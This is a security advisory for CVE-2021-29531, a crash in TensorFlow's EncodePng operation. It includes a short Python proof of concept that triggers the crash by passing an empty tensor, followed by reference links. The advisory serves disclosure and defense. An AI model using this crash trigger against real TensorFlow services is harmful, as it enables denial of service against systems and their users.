CVE-2021-29531: CHECK-fail in tf.raw_ops.EncodePng
(updated )
An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data:
import tensorflow as tf
image = tf.zeros([0, 0, 3])
image = tf.cast(image, dtype=tf.uint8)
tf.raw_ops.EncodePng(image=image)
References
- github.com/advisories/GHSA-3qxp-qjq7-w4hf
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-459.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-657.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-168.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1
- github.com/tensorflow/tensorflow/security/advisories/GHSA-3qxp-qjq7-w4hf
- nvd.nist.gov/vuln/detail/CVE-2021-29531
Detect and mitigate CVE-2021-29531 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →